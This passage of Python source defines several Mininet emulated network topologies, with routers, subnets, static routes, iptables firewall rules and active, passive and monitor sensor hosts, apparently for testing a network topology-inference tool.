    belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
    3 options are available:
        one sensor in first subnet,
        one sensor in second subnet,
        one sensor in both subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
        '''
        # .get() tolerates a missing 'sensorX' key (the original indexed params
        # directly and raised KeyError); bool() maps None/False to False.
        self.sensor1 = bool(params.get('sensor1'))  # Boolean
        self.sensor2 = bool(params.get('sensor2'))  # Boolean
        self.swc = {}  # Key: Number of switch, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.alias = {}  # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
        self.sroutes = {}  # Key: Router/Host/sensor id, value = list of static routes to be setup
        super(NetworkTopo2, self).__init__()

    def build( self, **_opts ):
        """Create the central router, one switch per subnet and ten hosts per subnet."""
        self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' )  #'14.21.5.38/8'
        self.alias['r1'] = []
        self.sroutes['r1'] = []
        for i in range(1, 3):  # 2 subnets
            # Add the switch
            self.swc[i] = self.addSwitch('s' + str(i))
            # Link the router to this subnet's switch (r1-eth1 / r1-eth2)
            rIP = '192.168.' + str(i) + '.1'
            self.addLink(self.swc[i], self.router, intfName2='r1-eth' + str(i),
                         params2={'ip': rIP + '/24'})
            self.alias['r1'].append(rIP)
            # Add the hosts: h0..h9 on subnet 1, h10..h19 on subnet 2, addresses .2 .. .11
            for j in range(1, 11):
                hid = 'h' + str(((i - 1) * 10) + j - 1)  # Just to make hosts start from zero..
                hIP = '192.168.' + str(i) + '.' + str(j + 1)
                self.net_hosts.append(self.addHost(hid, ip=hIP + '/24', defaultRoute=rIP))
                self.addLink(hid, self.swc[i])
                self.alias[hid] = [hIP]
                self.sroutes['r1'].append('ip route add ' + hIP + '/32 via ' + hIP + ' dev r1-eth' + str(i))
                self.sroutes[hid] = ['ip route add default via ' + rIP + ' dev ' + hid + '-eth0']
        # In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
        # we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
        # the passive host looks for new nodes, the monitor host runs the topology inference algorithm
        if self.sensor1:
            self.add_sensor(1)
        if self.sensor2:
            self.add_sensor(2)

    def add_sensor(self, i):
        """Attach the active/passive/monitor sensor triple to subnet i's switch."""
        asid = 'has' + str(i)
        psid = 'hps' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'  # Active sensor IP
        psIP = '192.168.' + str(i) + '.102'  # Passive sensor IP
        msIP = '192.168.' + str(i) + '.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i])
        self.addLink(psid, self.swc[i])
        self.addLink(msid, self.swc[i])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP, psIP, msIP]
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the 'alias' file: one line per node, name followed by its IPs.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo3( Topo ):
    """
    This topology simulates a network with 100 hosts: 50 belong to subnet 192.168.1.0/24 and the other 50
    belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
    3 options are available:
        one sensor in first subnet,
        one sensor in second subnet,
        one sensor in both subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
        '''
        # .get() tolerates a missing 'sensorX' key (the original indexed params
        # directly and raised KeyError); bool() maps None/False to False.
        self.sensor1 = bool(params.get('sensor1'))  # Boolean
        self.sensor2 = bool(params.get('sensor2'))  # Boolean
        self.swc = {}  # Key: Number of switch, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.alias = {}  # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
        self.sroutes = {}  # Key: Router/Host/sensor id, value = list of static routes to be setup
        super(NetworkTopo3, self).__init__()

    def build( self, **_opts ):
        """Create the central router, one switch per subnet and fifty hosts per subnet."""
        self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' )  #'14.21.5.38/8'
        self.alias['r1'] = []
        self.sroutes['r1'] = []
        for i in range(1, 3):  # 2 subnets
            # Add the switch
            self.swc[i] = self.addSwitch('s' + str(i))
            # Link the router to this subnet's switch (r1-eth1 / r1-eth2)
            rIP = '192.168.' + str(i) + '.1'
            self.addLink(self.swc[i], self.router, intfName2='r1-eth' + str(i),
                         params2={'ip': rIP + '/24'})
            self.alias['r1'].append(rIP)
            # Add the hosts: h0..h49 on subnet 1, h50..h99 on subnet 2, addresses .2 .. .51
            for j in range(1, 51):
                hid = 'h' + str(((i - 1) * 50) + j - 1)  # Just to make hosts start from zero..
                hIP = '192.168.' + str(i) + '.' + str(j + 1)
                self.net_hosts.append(self.addHost(hid, ip=hIP + '/24', defaultRoute=rIP))
                self.addLink(hid, self.swc[i])
                self.alias[hid] = [hIP]
                self.sroutes['r1'].append('ip route add ' + hIP + '/32 via ' + hIP + ' dev r1-eth' + str(i))
                self.sroutes[hid] = ['ip route add default via ' + rIP + ' dev ' + hid + '-eth0']
        # In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
        # we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
        # the passive host looks for new nodes, the monitor host runs the topology inference algorithm
        if self.sensor1:
            self.add_sensor(1)
        if self.sensor2:
            self.add_sensor(2)

    def add_sensor(self, i):
        """Attach the active/passive/monitor sensor triple to subnet i's switch."""
        asid = 'has' + str(i)
        psid = 'hps' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'  # Active sensor IP
        psIP = '192.168.' + str(i) + '.102'  # Passive sensor IP
        msIP = '192.168.' + str(i) + '.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i])
        self.addLink(psid, self.swc[i])
        self.addLink(msid, self.swc[i])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP, psIP, msIP]
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the 'alias' file: one line per node, name followed by its IPs.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo4( Topo ):
    """
    This topology simulates a network with three routers.
    Two hosts belong to subnet 12.0.0.0/8, representing the internet.
    Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
    Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
    Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
    Communication possible among all subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
        :param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor3: True if a sensor has to be placed in subnet 192.168.2.0/24
        :param sensor4: True if a sensor has to be placed in subnet 192.168.3.0/24
        '''
        # .get() tolerates missing 'sensorX' keys (the original indexed params
        # directly and raised KeyError); bool() maps None/False to False.
        self.sensor1 = bool(params.get('sensor1'))
        self.sensor2 = bool(params.get('sensor2'))
        self.sensor3 = bool(params.get('sensor3'))
        self.sensor4 = bool(params.get('sensor4'))
        self.swc = {}  # Key: Number of switch, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []   # here: the switches the passive sensors sniff on
        self.monitor_sensors = []
        self.interface_name = []    # switch interface each passive sensor listens on
        self.alias = {}  # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
        self.sroutes = {}  # Key: Router/Host/sensor id, value = list of static routes to be setup
        super(NetworkTopo4, self).__init__()

    def build( self, **_opts ):
        """Create routers r1/r2/r3, the six switches and the eight hosts."""
        # Connect router r1 to Internet Hosts
        r1IP1 = '12.10.5.1'
        self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
        self.alias['r1'] = []
        self.alias['r1'].append(r1IP1)
        self.sroutes['r1'] = []
        self.swc[1] = self.addSwitch('s1')
        self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
        self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
        self.addLink('h1', self.swc[1])
        self.alias['h1'] = ['12.10.5.2']
        self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
        self.addLink('h2', self.swc[1])
        self.alias['h2'] = ['12.10.5.3']
        self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
        self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
        self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
        self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
        # Connect the DMZ
        r1IP2 = '192.168.4.1'
        r2IP1 = '192.168.4.2'
        r2IP2 = '192.168.1.1'
        # TODO: the router's default address must always belong to the same network
        # as the hosts attached to it (e.g. r2IP1 does not work here!)
        self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
        self.alias['r2'] = []
        self.alias['r1'].append(r1IP2)
        self.alias['r2'].append(r2IP1)
        self.alias['r2'].append(r2IP2)
        self.sroutes['r2'] = []
        self.swc[5] = self.addSwitch('s5')
        self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
        self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
        self.swc[2] = self.addSwitch('s2')
        self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
        self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
        self.addLink('h3', self.swc[2])
        self.alias['h3'] = ['192.168.1.2']
        self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
        self.addLink('h4', self.swc[2])
        self.alias['h4'] = ['192.168.1.3']
        self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
        self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
        self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
        self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
        # Connect LAN 1 and LAN 2
        r1IP3 = '192.168.5.1'
        r3IP1 = '192.168.5.2'
        r3IP2 = '192.168.2.1'
        r3IP3 = '192.168.3.1'
        self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
        self.alias['r3'] = []
        self.alias['r1'].append(r1IP3)
        self.alias['r3'].append(r3IP1)
        self.alias['r3'].append(r3IP2)
        self.alias['r3'].append(r3IP3)
        self.sroutes['r3'] = []
        self.swc[6] = self.addSwitch('s6')
        # The first switch-router link MUST use the address given in the router definition
        self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
        self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
        self.swc[3] = self.addSwitch('s3')
        self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
        self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
        self.addLink('h5', self.swc[3])
        self.alias['h5'] = ['192.168.2.2']
        self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
        self.addLink('h6', self.swc[3])
        self.alias['h6'] = ['192.168.2.3']
        self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
        self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
        self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
        self.swc[4] = self.addSwitch('s4')
        self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
        self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
        self.addLink('h7', self.swc[4])
        self.alias['h7'] = ['192.168.3.2']
        self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
        self.addLink('h8', self.swc[4])
        self.alias['h8'] = ['192.168.3.3']
        self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
        self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
        if self.sensor1: self.add_sensor_Internet()
        if self.sensor2: self.add_sensor_LAN(1)
        if self.sensor3: self.add_sensor_LAN(2)
        if self.sensor4: self.add_sensor_LAN(3)

    def add_sensor_LAN(self, i):
        """Attach an active + monitor sensor pair to LAN i (DMZ for i == 1);
        the passive sensor here is the LAN's switch itself."""
        asid = 'has' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'  # Active sensor IP
        msIP = '192.168.' + str(i) + '.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        if i == 1:
            sensor = self.swc[2]
            intf = 's2-eth1'
        elif i == 2:
            sensor = self.swc[3]
            intf = 's3-eth1'
        else:
            sensor = self.swc[4]
            intf = 's4-eth1'
        self.passive_sensors.append(sensor)
        self.interface_name.append(intf)
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i + 1])
        self.addLink(msid, self.swc[i + 1])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        if i == 1:
            self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
        else:
            self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_sensor_Internet(self):
        """Attach an active + monitor sensor pair to the Internet subnet (s1)."""
        asid = 'hasI'
        msid = 'hmsI'
        rIP = '12.10.5.1'
        asIP = '12.10.5.101'  # Active sensor IP
        msIP = '12.10.5.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
        self.passive_sensors.append(self.swc[1])
        self.interface_name.append('s1-eth1')
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
        self.addLink(asid, self.swc[1])
        self.addLink(msid, self.swc[1])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the 'alias' file: one line per node, name followed by its IPs.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo5( Topo ):
    """
    This topology simulates a network with one router and two firewalls.
    Two hosts belong to subnet 12.0.0.0/8, representing the internet.
    Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
    Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
    Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
    Communication is only possible between Internet and DMZ and between LAN1 and LAN2.
    It is possible to put a sensor in each of the subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
        :param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor3: True if a sensor has to be placed in subnet 192.168.2.0/24
        :param sensor4: True if a sensor has to be placed in subnet 192.168.3.0/24
        '''
        # .get() tolerates missing 'sensorX' keys (the original indexed params
        # directly and raised KeyError); bool() maps None/False to False.
        self.sensor1 = bool(params.get('sensor1'))
        self.sensor2 = bool(params.get('sensor2'))
        self.sensor3 = bool(params.get('sensor3'))
        self.sensor4 = bool(params.get('sensor4'))
        self.swc = {}  # Key: Number of switch, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []   # here: the switches the passive sensors sniff on
        self.monitor_sensors = []
        self.interface_name = []    # switch interface each passive sensor listens on
        self.fw_rules = {}  # Key: host name, value: list of rules to be applied
        self.alias = {}  # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
        self.sroutes = {}  # Key: Router/Host/sensor id, value = list of static routes to be setup
        super(NetworkTopo5, self).__init__()

    def build( self, **_opts ):
        """Create routers r1/r2/r3 (r1 and r3 acting as firewalls), the six
        switches and the eight hosts."""
        # Connect router r1 to Internet Hosts
        r1IP1 = '12.10.5.1'
        self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
        self.alias['r1'] = []
        self.alias['r1'].append(r1IP1)
        self.sroutes['r1'] = []
        self.swc[1] = self.addSwitch('s1')
        self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
        self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
        self.addLink('h1', self.swc[1])
        self.alias['h1'] = ['12.10.5.2']
        self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
        self.addLink('h2', self.swc[1])
        self.alias['h2'] = ['12.10.5.3']
        self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
        self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
        self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
        self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
        # Connect the DMZ
        r1IP2 = '192.168.4.1'
        r2IP1 = '192.168.4.2'
        r2IP2 = '192.168.1.1'
        # TODO: the router's default address must always belong to the same network
        # as the hosts attached to it (e.g. r2IP1 does not work here!)
        self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
        self.alias['r2'] = []
        self.alias['r1'].append(r1IP2)
        self.alias['r2'].append(r2IP1)
        self.alias['r2'].append(r2IP2)
        self.sroutes['r2'] = []
        self.swc[5] = self.addSwitch('s5')
        self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
        self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
        self.swc[2] = self.addSwitch('s2')
        self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
        self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
        self.addLink('h3', self.swc[2])
        self.alias['h3'] = ['192.168.1.2']
        self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
        self.addLink('h4', self.swc[2])
        self.alias['h4'] = ['192.168.1.3']
        self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
        self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
        self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
        self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
        # r1 acts as a firewall: default-deny, allow only Internet <-> DMZ traffic
        self.fw_rules['r1'] = ['iptables -P FORWARD DROP']
        self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth1 -s 12.0.0.0/8 -o r1-eth2 -d 192.168.1.0/24 -j ACCEPT')
        self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth2 -s 192.168.1.0/24 -o r1-eth1 -d 12.0.0.0/8 -j ACCEPT')
        # Connect LAN 1 and LAN 2
        r1IP3 = '192.168.5.1'
        r3IP1 = '192.168.5.2'
        r3IP2 = '192.168.2.1'
        r3IP3 = '192.168.3.1'
        self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
        self.alias['r3'] = []
        self.alias['r1'].append(r1IP3)
        self.alias['r3'].append(r3IP1)
        self.alias['r3'].append(r3IP2)
        self.alias['r3'].append(r3IP3)
        self.sroutes['r3'] = []
        self.swc[6] = self.addSwitch('s6')
        # The first switch-router link MUST use the address given in the router definition
        self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
        self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
        self.swc[3] = self.addSwitch('s3')
        self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
        self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
        self.addLink('h5', self.swc[3])
        self.alias['h5'] = ['192.168.2.2']
        self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
        self.addLink('h6', self.swc[3])
        self.alias['h6'] = ['192.168.2.3']
        self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
        self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
        self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
        self.swc[4] = self.addSwitch('s4')
        self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
        self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
        self.addLink('h7', self.swc[4])
        self.alias['h7'] = ['192.168.3.2']
        self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
        self.addLink('h8', self.swc[4])
        self.alias['h8'] = ['192.168.3.3']
        self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
        self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
        # r3 acts as a firewall: default-deny, allow only LAN1 <-> LAN2 traffic
        self.fw_rules['r3'] = ['iptables -P FORWARD DROP']
        self.fw_rules['r3'].append('iptables -A FORWARD -i r3-eth2 -s 192.168.2.0/24 -o r3-eth3 -d 192.168.3.0/24 -j ACCEPT')
        self.fw_rules['r3'].append('iptables -A FORWARD -i r3-eth3 -s 192.168.3.0/24 -o r3-eth2 -d 192.168.2.0/24 -j ACCEPT')
        if self.sensor1: self.add_sensor_Internet()
        if self.sensor2: self.add_sensor_LAN(1)
        if self.sensor3: self.add_sensor_LAN(2)
        if self.sensor4: self.add_sensor_LAN(3)

    def add_sensor_LAN(self, i):
        """Attach an active + monitor sensor pair to LAN i (DMZ for i == 1);
        the passive sensor here is the LAN's switch itself."""
        asid = 'has' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'  # Active sensor IP
        msIP = '192.168.' + str(i) + '.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        if i == 1:
            sensor = self.swc[2]
            intf = 's2-eth1'
        elif i == 2:
            sensor = self.swc[3]
            intf = 's3-eth1'
        else:
            sensor = self.swc[4]
            intf = 's4-eth1'
        self.passive_sensors.append(sensor)
        self.interface_name.append(intf)
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i + 1])
        self.addLink(msid, self.swc[i + 1])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        if i == 1:
            self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
        else:
            self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_sensor_Internet(self):
        """Attach an active + monitor sensor pair to the Internet subnet (s1)."""
        asid = 'hasI'
        msid = 'hmsI'
        rIP = '12.10.5.1'
        asIP = '12.10.5.101'  # Active sensor IP
        msIP = '12.10.5.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
        self.passive_sensors.append(self.swc[1])
        self.interface_name.append('s1-eth1')
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
        self.addLink(asid, self.swc[1])
        self.addLink(msid, self.swc[1])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def add_firewall_rules(self, net):
        '''Add firewall rules'''
        for k in self.fw_rules.keys():
            for r in self.fw_rules[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the 'alias' file: one line per node, name followed by its IPs.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo6(Topo):
    """
